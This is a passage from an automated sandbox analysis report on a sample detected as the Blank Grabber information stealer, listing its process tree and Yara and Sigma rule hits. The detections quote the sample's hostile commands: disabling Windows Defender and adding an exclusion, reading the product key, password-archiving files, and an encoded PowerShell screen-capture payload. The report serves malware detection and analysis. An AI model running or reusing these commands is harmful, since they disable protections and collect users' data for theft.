      • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7612 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1432 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5592 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7200 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI73802\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 13 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", ProcessId: 7452, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7460, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", ProcessId: 7188, ProcessName: cmd.exe
              Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7780, StartAddress: 213032B0, TargetImage: C:\Windows\System32\systeminfo.exe, TargetProcessId: 7780
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
